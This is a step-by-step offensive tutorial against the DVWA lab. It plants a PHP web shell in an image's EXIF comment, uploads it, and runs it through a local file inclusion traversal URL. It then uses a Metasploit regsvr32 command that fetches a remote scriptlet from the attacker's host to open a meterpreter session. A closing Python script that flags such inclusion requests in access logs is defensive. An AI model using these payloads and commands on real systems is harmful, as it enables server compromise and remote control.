Web Server Exploitation with LFI and File Upload

In this article you will learn how to bypass the file upload protection at high security through a file inclusion vulnerability, and how to use local file inclusion to get a reverse connection from the victim's PC.

Attacker: Kali Linux

Target: DVWA

First you need to download the Exif Pilot tool from here. This is a GUI tool for Windows users which allows adding EXIF data and metadata to JPEG, PNG and GIF images.

Now open Exif Pilot and select any image in which to hide the malicious comment; from the screenshot you can see I have chosen the shell.png image. Then click on EDIT EXIF/IPTC.

Next, in the comment text field, type <?php system($_GET['c']); ?> as the malicious code and click OK.

The EXIF data has now been edited successfully inside the image. The tool replaces the original image with the malicious image in the same folder and sends the original image to the recycle bin.

Now open the target IP in a browser and log in to DVWA with admin: password as the credentials. Set the security level to high.

Choose the File Upload vulnerability to upload the malicious image to the web server application, browse to your malicious image shell.png, and click on upload.

It will show the path of the uploaded image; copy the highlighted path.

Now open the copied path in the browser, where you will find the uploaded image.

In order to execute the malicious code, we need to change the vulnerability category as well as the security level so that the comment hidden inside the image can be executed.

Now set the security level to low.

In order to bypass the file upload protection at DVWA's high security level we need to use another vulnerability, and I have selected File Inclusion for this purpose.

File Inclusion allows users to execute any file through the URL, as I have described above.

Now paste the path of the uploaded image copied above into the URL as shown in the screenshot.

http://192.168.1.102/dvwa/vulnerabilities/fi/?page=../../hackable/uploads/shell.png

Here it gives the warning system(): cannot execute blank command, which means we need to add a command for execution; through the URL we will then be able to execute any command.

http://192.168.1.102/dvwa/vulnerabilities/fi/?page=../../hackable/uploads/shell.png&c=ifconfig

Here I check the network configuration of the victim's PC, and you can see the result in the screenshot.

http://192.168.1.102/dvwa/vulnerabilities/fi/?page=../../hackable/uploads/shell.png&c=dir

Here you can view the directories that I got by executing the dir command in the URL.

Next I will try to obtain a meterpreter session using Kali Linux.

Type msfconsole to load the Metasploit framework.

use exploit/windows/misc/regsvr32_applocker_bypass_server

msf exploit(regsvr32_applocker_bypass_server) > set lhost 192.168.1.103

msf exploit(regsvr32_applocker_bypass_server) > set lport 1234

msf exploit(regsvr32_applocker_bypass_server) > exploit

regsvr32 /s /n /u /i:http://192.168.1.103:8080/7vnJTV4ONLKkU19.sct scrobj.dll

Copy the above malicious code and send it to the victim.

Paste the above .dll malicious code into the URL; when you run it in the browser, the attacker will get the victim's meterpreter session on his Kali Linux.

http://192.168.1.102/dvwa/vulnerabilities/fi/?page=../../hackable/uploads/shell.png&c=regsvr32 /s /n /u /i:http://192.168.1.103:8080/7vnJTV4ONLKkU19.sct scrobj.dll

Meterpreter session 1 will open.

Meterpreter>sysinfo
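
The include requests used in this walkthrough leave a recognizable pattern in the web server's access log. As an added example (not part of the original article), this Python script flags requests to the file inclusion endpoint whose page parameter resolves into the upload directory. The endpoint and upload paths are taken from the URLs above; the log lines, function names and finding labels are constructed for illustration.

```python
import posixpath
import re
from urllib.parse import parse_qs, urlsplit

# Assumptions taken from the URLs on this page: the include endpoint, the
# upload directory, and that URL paths mirror the on-disk layout.
FI_ENDPOINT = "/dvwa/vulnerabilities/fi/"
UPLOAD_DIR = "/dvwa/hackable/uploads/"
IMAGE_EXT = (".png", ".jpg", ".jpeg", ".gif")
EXPECTED_PARAMS = {"page"}
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample lines (common log format), not captured traffic.
SAMPLE_LOG = [
    '192.168.1.103 - - [01/Jan/2024:10:00:01 +0000] "GET /dvwa/vulnerabilities/fi/?page=include.php HTTP/1.1" 200 4021',
    '192.168.1.103 - - [01/Jan/2024:10:00:09 +0000] "GET /dvwa/vulnerabilities/fi/?page=../../hackable/uploads/shell.png HTTP/1.1" 200 4310',
    '192.168.1.103 - - [01/Jan/2024:10:00:15 +0000] "GET /dvwa/vulnerabilities/fi/?page=..%2F..%2Fhackable%2Fuploads%2Fshell.png&c=dir HTTP/1.1" 200 5120',
]

def inspect_request(log_line):
    """Return findings for one access-log line; an empty list means not flagged."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return []
    url = urlsplit(match.group(1))
    if not url.path.startswith(FI_ENDPOINT):
        return []
    params = parse_qs(url.query, keep_blank_values=True)  # percent-decodes values
    findings = []
    for value in params.get("page", []):
        value = value.replace("\\", "/")  # treat Windows separators like "/"
        if ".." in value.split("/"):
            findings.append("traversal")
        # Resolve the include target relative to the endpoint's directory.
        resolved = posixpath.normpath(posixpath.join(FI_ENDPOINT, value))
        if resolved.startswith(UPLOAD_DIR):
            findings.append("includes-upload")
        if resolved.lower().endswith(IMAGE_EXT):
            findings.append("includes-image")
    # Parameters the endpoint does not use are only reported on flagged requests.
    extra = sorted(set(params) - EXPECTED_PARAMS)
    if findings and extra:
        findings.append("extra-params:" + ",".join(extra))
    return findings

def scan(lines):
    """Return (line_number, findings) for every flagged line."""
    results = [(n, inspect_request(line)) for n, line in enumerate(lines, 1)]
    return [(n, f) for n, f in results if f]

if __name__ == "__main__":
    for number, findings in scan(SAMPLE_LOG):
        print(number, findings)
```

An include target that is user-uploaded content is the signal that matters here, so the same check can run as a blocking rule in front of the application as well as over stored logs.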